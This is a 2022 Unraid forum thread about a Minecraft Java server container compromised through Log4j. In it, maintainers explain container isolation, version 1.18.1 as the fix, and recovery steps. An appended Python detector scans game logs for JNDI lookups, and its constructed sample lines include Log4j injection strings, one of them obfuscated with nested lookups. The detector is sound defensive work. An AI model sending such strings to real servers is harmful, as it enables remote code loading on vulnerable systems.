January 21, 2022
Hey, I have noticed that one of my Docker containers got infected through the Log4j attack. And now I'm not sure how to deal with it. Is it possible that it escaped the Docker container and the whole Unraid installation is infected?
January 21, 2022
Yes! Wtf you can’t post a message like that and not at least let others know what container is vulnerable.
January 22, 2022 (Author)
Yea sorry, forgot mentioning that it's a Minecraft server (binhex-minecraftjava). I'm pretty sure it's log4j because in the game-log files I see the chat message used by a very suspicious username "INETDataSurveyP35x".
Edited January 22, 2022 by Senu
January 22, 2022
One of the upshots of docker is that the rest of the files on your server that you have are only visible to any given app if YOU give the app permission to them. @binhex, any thoughts?
January 22, 2022
17 minutes ago, Squid said: One of the upshots of docker is that the rest of the files on your server that you have are only visible to any given app if YOU give the app permission to them. @binhex, any thoughts?
As I'm sure anybody who runs Minecraft Java is aware (well reported on the internet), Minecraft was highlighted as having the log4j vulnerability. This was then patched by Mojang and quickly released, but obviously the patch and fix is only available for the current latest version of Minecraft Java; if you run earlier versions then you are still vulnerable. I'm assuming the OP was indeed running a version prior to the fixed version (1.18.1). There are, according to Mojang, certain mitigations you can do for earlier versions, but this would be up to the user to perform these. Link to doc: https://help.minecraft.net/hc/en-us/articles/4416199399693-Security-Vulnerability-in-Minecraft-Java-Edition
So as far as damage limitation goes, as long as the OP did not add any additional volume binds then it will be limited to /config only, so a quick restore from backup or, at worst, copy your world somewhere, then delete everything in /config, fix up to prevent the vulnerability and restart container and copy the world back should suffice.
January 22, 2022
30 minutes ago, binhex said: fixed version (1.18.1)
I'm assuming that the current container is this version or greater?
January 22, 2022
Quote: I'm assuming that the current container is this version or greater?
Correct, latest version is built automatically and is the default version included with the image.
January 22, 2022
I tell ya what, I will firstly put a big fat warning on my threads and secondly I will see if I can detect the version of Minecraft jar; if so I can attempt to patch for the user using the guidance in the link above.
Edit: just to be clear, anything running Minecraft Java is potentially vulnerable when using earlier versions, so mineos-node and crafty images are also prone when not running Minecraft server latest versions.
January 23, 2022 (Author)
@binhex @squid ... you all went above and beyond! I really appreciate the help. I'm still quite new to the whole Unraid world and this is my first question on the forum here. Really cool to see an active and supporting community. I didn't bind any drives/directories to the container so the damage is minimal. I'm using the container with a "custom" forge.jar still running 1.7.10.
January 23, 2022
17 hours ago, Senu said: @binhex @squid ... you all went above and beyond! I really appreciate the help. I'm still quite new to the whole Unraid world and this is my first question on the forum here. Really cool to see an active and supporting community. I didn't bind any drives/directories to the container so the damage is minimal. I'm using the container with a "custom" forge.jar still running 1.7.10.
Yep, running any Minecraft server v1.7.1 to v1.18.0 will expose you to the vulnerability, so that def explains why it happened. So I've done what I can here: I have spammed all Minecraft Java support threads that I own with a warning and what to do to patch, and I have also automated patching of binhex/minecraftserver. However, it's not possible for me to automatically patch mineos-node or crafty (multi Minecraft server frontend), as configuration for each server is done through the server web UI and thus must be done by the user for each running Minecraft instance.
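Added example, not part of any post in this thread: the game-log check the original poster describes, done mechanically. It flags chat lines carrying a Log4j JNDI lookup, including ones hidden behind nested lookups. The log format, the sample lines and the host example.invalid are constructed, and the lookup resolution only approximates what Log4j does.

```python
import re

# Innermost ${...} expression: one that contains no further braces.
INNER = re.compile(r"\$\{([^{}]*)\}")
# The lookup prefix that makes a logged string dangerous on vulnerable versions.
JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)

def _resolve(match):
    """Approximate the text Log4j would substitute for one innermost lookup."""
    body = match.group(1)
    prefix, sep, rest = body.partition(":")
    if sep and prefix.strip().lower() in ("lower", "upper"):
        return rest                      # ${lower:j} -> j (case is ignored later)
    if ":-" in body:
        return body.split(":-", 1)[1]    # ${name:-default} -> default
    return ""                            # unknown lookup: assume it resolves empty

def has_jndi_lookup(line, max_rounds=10):
    """True if the line contains a JNDI lookup, directly or after unnesting."""
    text = line
    for _ in range(max_rounds):
        if JNDI.search(text):
            return True
        reduced = INNER.sub(_resolve, text)
        if reduced == text:              # nothing left to unnest
            return False
        text = reduced
    return bool(JNDI.search(text))

def scan(log_text):
    """Return (line_number, line) for every suspicious line in a log."""
    return [(n, line)
            for n, line in enumerate(log_text.splitlines(), 1)
            if has_jndi_lookup(line)]

# Constructed sample log; only the username comes from the thread.
SAMPLE_LOG = """\
[10:01:12] [Server thread/INFO]: Steve joined the game
[10:01:40] [Server thread/INFO]: <Steve> anyone selling ${diamonds}?
[10:02:03] [Server thread/INFO]: <INETDataSurveyP35x> ${jndi:ldap://example.invalid/a}
[10:02:09] [Server thread/INFO]: <INETDataSurveyP35x> ${${lower:j}ndi:${::-l}dap://example.invalid/b}
"""

if __name__ == "__main__":
    for n, line in scan(SAMPLE_LOG):
        print(f"line {n}: {line}")
```

A hit shows that a lookup string reached the log, not that it was resolved; that depends on the server version, as discussed in the thread.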